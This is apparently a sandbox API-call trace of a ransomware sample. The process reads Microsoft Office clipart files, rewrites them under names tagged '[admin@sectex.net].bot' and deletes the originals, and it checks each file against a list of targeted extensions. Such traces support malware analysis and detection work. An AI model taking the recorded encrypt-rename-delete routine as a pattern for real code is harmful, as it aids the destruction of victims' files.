	[0149.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.195] GetLastError () returned 0x0
	[0149.195] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5664, lpOverlapped=0x0) returned 1
	[0149.211] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5670, lpOverlapped=0x0) returned 1
	[0149.212] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.212] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.212] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.212] CloseHandle (hObject=0x3f0) returned 1
	[0149.212] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.212] SetEndOfFile (hFile=0x384) returned 1
	[0149.214] CloseHandle (hObject=0x384) returned 1
	[0149.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.215] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf")) returned 1
	[0149.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.215] lstrlenW (lpString=".doc") returned 4
	[0149.215] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.215] lstrlenW (lpString=".docx") returned 5
	[0149.215] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.215] lstrlenW (lpString=".pdf") returned 4
	[0149.215] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.215] lstrlenW (lpString=".xls") returned 4
	[0149.215] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.215] lstrlenW (lpString=".xlsx") returned 5
	[0149.215] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.216] lstrlenW (lpString=".ppt") returned 4
	[0149.216] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString=".zip") returned 4
	[0149.216] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.216] lstrlenW (lpString=".rar") returned 4
	[0149.216] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString=".bz2") returned 4
	[0149.216] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString=".7z") returned 3
	[0149.216] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString=".dbf") returned 4
	[0149.216] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString=".1cd") returned 4
	[0149.216] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString=".jpg") returned 4
	[0149.216] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.216] lstrlenW (lpString=".doc") returned 4
	[0149.216] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString=".docx") returned 5
	[0149.216] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.216] lstrlenW (lpString=".pdf") returned 4
	[0149.216] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.216] lstrlenW (lpString=".xls") returned 4
	[0149.216] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.216] lstrlenW (lpString=".xlsx") returned 5
	[0149.217] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.217] lstrlenW (lpString=".ppt") returned 4
	[0149.217] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.217] lstrlenW (lpString=".zip") returned 4
	[0149.217] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.217] lstrlenW (lpString=".rar") returned 4
	[0149.217] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.217] lstrlenW (lpString=".bz2") returned 4
	[0149.217] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.217] lstrlenW (lpString=".7z") returned 3
	[0149.217] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.217] lstrlenW (lpString=".dbf") returned 4
	[0149.217] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.217] lstrlenW (lpString=".1cd") returned 4
	[0149.217] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 63
	[0149.217] lstrlenW (lpString=".jpg") returned 4
	[0149.217] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.217] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.217] lstrlenW (lpString="IN00118_.WMF") returned 12
	[0149.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.228] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=792) returned 1
	[0149.228] CloseHandle (hObject=0x384) returned 1
	[0149.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf")) returned 0x20
	[0149.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.229] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.229] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.230] GetLastError () returned 0x0
	[0149.230] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x318, lpOverlapped=0x0) returned 1
	[0149.231] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x320, lpOverlapped=0x0) returned 1
	[0149.232] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.232] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.232] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.232] CloseHandle (hObject=0x3f0) returned 1
	[0149.232] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.232] SetEndOfFile (hFile=0x384) returned 1
	[0149.234] CloseHandle (hObject=0x384) returned 1
	[0149.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf")) returned 1
	[0149.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.235] lstrlenW (lpString=".doc") returned 4
	[0149.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.235] lstrlenW (lpString=".docx") returned 5
	[0149.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.235] lstrlenW (lpString=".pdf") returned 4
	[0149.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.235] lstrlenW (lpString=".xls") returned 4
	[0149.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.235] lstrlenW (lpString=".xlsx") returned 5
	[0149.236] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.236] lstrlenW (lpString=".ppt") returned 4
	[0149.236] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString=".zip") returned 4
	[0149.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.236] lstrlenW (lpString=".rar") returned 4
	[0149.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString=".bz2") returned 4
	[0149.236] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString=".7z") returned 3
	[0149.236] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString=".dbf") returned 4
	[0149.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString=".1cd") returned 4
	[0149.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString=".jpg") returned 4
	[0149.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.236] lstrlenW (lpString=".doc") returned 4
	[0149.236] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString=".docx") returned 5
	[0149.236] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.236] lstrlenW (lpString=".pdf") returned 4
	[0149.236] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.236] lstrlenW (lpString=".xls") returned 4
	[0149.236] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.237] lstrlenW (lpString=".xlsx") returned 5
	[0149.237] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.237] lstrlenW (lpString=".ppt") returned 4
	[0149.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.237] lstrlenW (lpString=".zip") returned 4
	[0149.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.237] lstrlenW (lpString=".rar") returned 4
	[0149.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.237] lstrlenW (lpString=".bz2") returned 4
	[0149.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.237] lstrlenW (lpString=".7z") returned 3
	[0149.237] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.237] lstrlenW (lpString=".dbf") returned 4
	[0149.237] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.237] lstrlenW (lpString=".1cd") returned 4
	[0149.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned 63
	[0149.237] lstrlenW (lpString=".jpg") returned 4
	[0149.237] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.238] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.238] lstrlenW (lpString="IN00177_.WMF") returned 12
	[0149.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.238] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1074) returned 1
	[0149.238] CloseHandle (hObject=0x384) returned 1
	[0149.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf")) returned 0x20
	[0149.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.239] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.239] GetLastError () returned 0x0
	[0149.239] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x432, lpOverlapped=0x0) returned 1
	[0149.241] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0149.242] ReadFile (in: hFile=0x384, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.242] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.242] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.245] CloseHandle (hObject=0x3f0) returned 1
	[0149.245] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.245] SetEndOfFile (hFile=0x384) returned 1
	[0149.247] CloseHandle (hObject=0x384) returned 1
	[0149.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.247] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf")) returned 1
	[0149.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.248] lstrlenW (lpString=".doc") returned 4
	[0149.248] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.248] lstrlenW (lpString=".docx") returned 5
	[0149.248] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.248] lstrlenW (lpString=".pdf") returned 4
	[0149.248] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.248] lstrlenW (lpString=".xls") returned 4
	[0149.248] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.248] lstrlenW (lpString=".xlsx") returned 5
	[0149.248] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.248] lstrlenW (lpString=".ppt") returned 4
	[0149.248] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.248] lstrlenW (lpString=".zip") returned 4
	[0149.248] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.248] lstrlenW (lpString=".rar") returned 4
	[0149.248] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.248] lstrlenW (lpString=".bz2") returned 4
	[0149.248] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.248] lstrlenW (lpString=".7z") returned 3
	[0149.248] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString=".dbf") returned 4
	[0149.249] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString=".1cd") returned 4
	[0149.249] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString=".jpg") returned 4
	[0149.249] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString=".doc") returned 4
	[0149.249] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString=".docx") returned 5
	[0149.249] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.249] lstrlenW (lpString=".pdf") returned 4
	[0149.249] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString=".xls") returned 4
	[0149.249] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.249] lstrlenW (lpString=".xlsx") returned 5
	[0149.249] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.249] lstrlenW (lpString=".ppt") returned 4
	[0149.249] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.249] lstrlenW (lpString=".zip") returned 4
	[0149.249] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.249] lstrlenW (lpString=".rar") returned 4
	[0149.249] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.249] lstrlenW (lpString=".bz2") returned 4
	[0149.249] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.250] lstrlenW (lpString=".7z") returned 3
	[0149.250] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.250] lstrlenW (lpString=".dbf") returned 4
	[0149.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.250] lstrlenW (lpString=".1cd") returned 4
	[0149.250] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 63
	[0149.250] lstrlenW (lpString=".jpg") returned 4
	[0149.250] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.250] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.250] lstrlenW (lpString="IN00204_.WMF") returned 12
	[0149.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.251] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1848) returned 1
	[0149.251] CloseHandle (hObject=0x384) returned 1
	[0149.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf")) returned 0x20
	[0149.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.251] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.251] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.252] GetLastError () returned 0x0
